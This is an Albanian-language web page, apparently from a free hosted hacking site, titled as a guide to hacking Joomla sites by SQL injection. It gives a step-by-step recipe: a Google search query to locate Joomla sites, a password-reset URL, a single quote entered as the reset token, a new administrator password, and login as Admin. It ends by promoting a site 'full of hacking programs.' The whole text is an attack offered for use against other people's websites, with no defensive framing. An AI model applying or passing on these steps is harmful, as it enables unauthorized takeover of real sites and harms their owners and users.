Si te Hackojme Joomla Sites (SQL Injection)
Se pari hyjme :

Cito:
WwW.GoogLe.com
Me pas ne BOX shenojme :

Cito:
inurl:index.php?option=com_user site:.com
Qe sherben per me gjet sajte Joomla, ndersa aty .com mundeni me bo ndryshu domainin qfare deshironi ta hackni
P.SH .ru .dk .de etj etj

Ja P.SH keshtu duhet te jete (ndryshe sben) :

Cito:
http://www.bllablla.ru/index.php?opt...er&view=remind
Tash vazhdojme keshtu
Ja hekim kete pjesen e fundit :

Cito:
index.php?option=com_user&view=remind
Dhe e zevendesojme me kete :

Cito:

index.php?option=com_user&view=reset&layout=confir m
Pastaj do ju del ni box ku shkruan TOKEN dhe ne te duhet te shenoni vetem kete shenje qe gjendet me posht me te kalter :

'

Pastaj do ju dal te shenoni Passwordin e ri dhe ta komfirmoni ate !!
Dhe me pas ne Web ja bojme Login :

Login : Admin
Pass : Si e keni lon ju

KUJDES :

* Nuk punon ne te gjitha mirepo ne shumicen e webeve punon

WwW.Argetohu-ks.page.tl emer plot me programe hacking!!!
 
 
 
 
 
 
 
Sod ne faqen ton pati 289638 visitors (1419618 hits) Ne ket faqe
This website was created for free with Own-Free-Website.com. Would you also like to have your own website?
Sign up for free